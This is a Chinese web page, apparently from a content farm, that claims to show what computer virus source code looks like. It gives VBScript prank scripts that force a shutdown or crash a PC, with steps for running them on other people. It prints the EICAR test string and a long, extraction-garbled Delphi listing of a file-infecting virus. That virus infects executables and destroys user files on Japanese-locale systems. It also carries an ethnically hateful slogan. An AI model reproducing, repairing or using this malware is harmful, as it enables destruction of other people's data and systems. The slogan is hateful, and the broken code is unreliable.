2023年12月11日發(作者:西游記簡介及主要內容)

計算機病毒源代碼什么樣
萬惡的計算機病毒也是有源代碼組成的,那么計算機病毒代碼長什么樣呢?下面由店鋪給你做出詳細的計算機病毒源代碼介紹!希望對你有幫助!
計算機病毒源代碼介紹一:
給你個惡搞的玩on error resume next
dim WSHshellA
t WSHshellA = object("")
" /c shutdown -r -t 60 -c ""說我是豬,不說我是豬就一分鐘關你機,不信,試試···"" ",0 ,true
dim a
do while(a <> "我是豬")
a = inputbox ("說我是豬,就不關機,快撒,說 ""我是豬"" ","說不說","不說",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早說就行了嘛"
dim WSHshell
t WSHshell = object("")
" /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真過癮"
把這段復制,新建一個文本文檔,粘貼進去,保存,然后右擊,屬性,將后綴由.txt改為.vbs 確定就行了!以后雙擊這個vbs文件就能捉弄人了
計算機病毒源代碼介紹二:
最簡單的一個電腦病毒
版本:
打開記事本,輸入以下代碼:
Do Until 1=2 "煩死你!"
Loop
保存為,運行后不斷出現"煩死你"的對話框。
6版本:
打開Visual Basic 6.0,雙擊窗體,輸入以下代碼:
Private Sub Form_Load()
Do Until 1=2
Shell ""
Loop
End Sub 保存后編譯為EXE文件,運行后馬上死機。
計算機病毒源代碼介紹三:
把下面這段代碼復制到記事本里,保存為文本文件
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
熊貓燒香
ogram Japussy;
us
Windows, SysUtils, Class, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒體的大小
IconOfft = $12EB8; //PE文件主圖標的偏移量
//在我的Delphi5 SP1上面編譯得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六進制字符串可以找到主圖標的偏移量
{
HeaderSize = 38912; //Upx壓縮過病毒體的大小
IconOfft = $92BC; //Upx壓縮過PE文件主圖標的偏移量
//Upx 1.24W 用法: upx -9 --8086 }
IconSize = $2E8; //PE文件主圖標的大小--744字節
IconTail = IconOfft + IconSize; //PE文件主圖標的尾部
ID = $44444444; //感染標記
//垃圾碼,以備寫入
Catchword = 'If a race need to be killed out, it must be
Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** .A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType:
Integer): Integer;
stdcall; external ''; //函數聲明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = Fal; //日文操作系統標記
{ 判斷是否為Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := Fal;
rsionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (formID = VER_PLATFORM_WIN32_WINDOWS)
then //Win9x
Result := True; end;
{ 在流之間復制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst:
TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := on;
dCurPos := on;
(sStartPos, 0);
(dStartPos, 0);
om(Src, Count);
(sCurPos, 0);
(dCurPos, 0);
end;
{ 將宿主文件從已感染的PE文件中分離出來,以備使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := (ParamStr(0), fmOpenRead or
fmShareDenyNone);
try
dStream := (FileName, fmCreate);
try
(HeaderSize, 0); //跳過頭部的病毒部分
om(sStream, - HeaderSize);
finally ;
end;
finally
;
end;
except
end;
end;
{ 填充STARTUPINFO結構 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
:= SizeOf(Si);
rved := nil;
top := nil;
e := nil;
s := STARTF_USESHOWWINDOW;
indow := State;
rved2 := 0;
rved2 := nil;
end;
{ 發帶毒郵件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream; iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出錯則文件正在被使用,退出
if CompareText(FileName, '') = 0 then //是自己則不感染
Exit;
Infected := Fal;
IsPE := Fal;
SrcStream := (FileName, fmOpenRead);
try
for i := 0 to $108 do //檢查PE文件頭
begin
(i, soFromBeginning);
(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE標記
begin
IsPE := True; //是PE文件
Break;
end;
end;
(-4, soFromEnd); //檢查感染標記
(iID, 4);
if (iID = ID) or ( < 10240) then //太小的文件不感染
Infected := True;
finally ;
end;
if Infected or (not IsPE) then //如果感染過了或不是PE文件則退出
Exit;
IcoStream := ;
DstStream := ;
try
aIcon := ;
try
//得到被感染文件的主圖標(744字節),存入流
eHandle;
:= ExtractIcon(HInstance, PChar(FileName), 0);
Stream(IcoStream);
finally
;
end;
SrcStream := (FileName, fmOpenRead);
//頭文件
HdrStream := (ParamStr(0), fmOpenRead
or fmShareDenyNone);
try
//寫入病毒體主圖標之前的數據
CopyStream(HdrStream, 0, DstStream, 0, IconOfft);
//寫入目前程序的主圖標
CopyStream(IcoStream, 22, DstStream, IconOfft, IconSize);
//寫入病毒體主圖標到病毒體尾部之間的數據
CopyStream(HdrStream,
HeaderSize - IconTail);
//寫入宿主程序
IconTail, DstStream, IconTail, CopyStream(SrcStream,
);
//寫入已感染的標記
(0, 2);
iID := $44444444;
(iID, 4);
finally
;
end;
finally
;
;
0, DstStream, HeaderSize,
File(FileName); //替換宿主文件
;
end;
except;
end;
end;
{ 將目標文件寫入垃圾碼后刪除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只讀屬性
FileHandle := FileOpen(FileName, fmOpenWrite); //打開文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0; Randomize;
Max := Random(15); //寫入垃圾碼的隨機次數
if Max < 5 then
Max := 5;
Mass := Size div Max; //每個間隔塊的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//寫入垃圾碼,將文件徹底破壞掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClo(FileHandle); //關閉文件
end;
DeleteFile(PChar(FileName)); //刪除之
except
end;
end;
{ 獲得可寫的驅動器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍歷26個字母
begin D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盤和網絡盤
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE)
then
Result := Result + D;
end;
end;
{ 遍歷目錄,感染和摧毀文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if ( '.') and
( <> '..') then
Result := 0 //不是目錄
el if ( = 16) and ( <> '.') and
( <> '..') then
Result := 1 //不是根目錄
el Result := 2; //是根目錄
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //調整消息隊列,避免引起懷疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + ;
Ext := UpperCa(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可執行文件
end
el if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,將Ba64編碼后的病毒寫入
//感染瀏覽此網頁的所有用戶
//哪位大兄弟愿意完成之?
end
el if Ext = '.WAB' then //Outlook地址簿文件
begin
//獲取Outlook郵件地址
end
el if Ext = '.ADC' then //Foxmail地址自動完成文件
begin
//獲取Foxmail郵件地址
end
el if Ext = 'IND' then //Foxmail地址簿文件
begin
//獲取Foxmail郵件地址
end
el begin
if IsJap then //是倭文操作系統
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毀文件
end;
end;
end;
//感染或刪除一個文件后睡眠200毫秒,避免CPU占用率過高引起懷疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClo(SearchRec);
SubDir := ;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
();
until (FindNext(SearchRec) <> 0);
end;
FindClo(SearchRec);
Count := - 1;
for i := 0 to Count do LoopFiles(Path + s + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍歷磁盤上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系統
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可寫的磁盤列表
Len := Length(DriverList);
while True do //死循環
begin
for i := Len downto 1 do //遍歷每個磁盤驅動器
LoopFiles(DriverList + ':', '*.*'); //感染之
SendMail; //發帶毒郵件
Sleep(1000 * 60 * 5); //睡眠5分鐘
end;
end;
{ 主程序開始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注冊為服務進程
el //WinNT
begin
//遠程線程映射到Explorer進程
//哪位兄臺愿意完成之? end;
//如果是原始病毒體自己
if CompareText(ExtractFileName(ParamStr(0)), '')
= 0 then
InfectFiles //感染和發郵件
el //已寄生于宿主程序上了,開始工作
begin
TmpFile := ParamStr(0); //創建臨時文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一個空格
ExtractFile(TmpFile); //分離之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //創建新進程運行之
InfectFiles; //感染和發郵件
end;
本文發布于:2023-12-11 18:55:02,感謝您對本站的認可!
本文鏈接:http://www.newhan.cn/zhishi/a/1702292102118509.html
版權聲明:本站內容均來自互聯網,僅供演示用,請勿用于商業和其他非法用途。如果侵犯了您的權益請與我們聯系,我們將在24小時內刪除。
本文word下載地址:計算機病毒源代碼什么樣.doc
本文 PDF 下載地址:計算機病毒源代碼什么樣.pdf
| 留言與評論(共有 0 條評論) |